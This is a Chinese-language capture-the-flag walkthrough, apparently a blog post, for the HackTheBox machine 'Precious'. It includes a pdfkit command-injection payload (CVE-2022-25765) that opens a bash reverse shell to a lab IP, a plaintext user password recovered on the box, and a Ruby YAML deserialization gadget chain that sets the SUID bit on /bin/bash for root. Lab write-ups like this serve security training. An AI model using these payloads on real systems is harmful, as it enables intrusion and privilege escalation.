HackTheBox Precious

0x000 信息收集

开启机器，拿到IP

端口扫描

nmap -sC -sV 10.10.11.189 -o precious

添加hosts文件，访问网站

echo "10.10.11.189 precious.htb" >> /etc/hosts

0x001 漏洞利用

pdfkit命令执行官漏洞(CVE-2022-25765)

经过测试，发现能加载本地URL

本地开启http服务

python -m http.server 80

可以看到将网页转换成了pdf，将pdf下载到本地

exiftool imb0rbfafu1vuiuro158igfeh40s62un.pdf

搜索pdfkit v0.8.6相关漏洞，发现存在命令执行漏洞

CVE-2022-25765 https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

poc: http://example.com/?name=#{'%20bash -c "bash -i >& /dev/tcp/10.10.14.23/1234 0>&1"'}

成功获取到反弹shell。

在.bundle目录下找到了henry用户的密码。

henry:Q3c1AqGHtoI0aXAYFH

0x002 提权

suid提权

ssh登陆

Ruby是一种纯粹的面向对象编程语言。它由日本的松本行弘（まつもとゆきひろ/Yukihiro Matsumoto）创建于1993年。
https://www.runoob.com/ruby/ruby-intro.html

查看代码，发现当我们去执行/opt/update_dependencies.rb文件的时候，就回去加载dependencies.yml文件

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod u+s /bin/bash
         method_id: :resolve

0x003 flag

posted @ 2023-02-23 19:37 Cx330Lm 阅读(32) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Cx330Lm

时间让我们沉淀，空间让我们成长。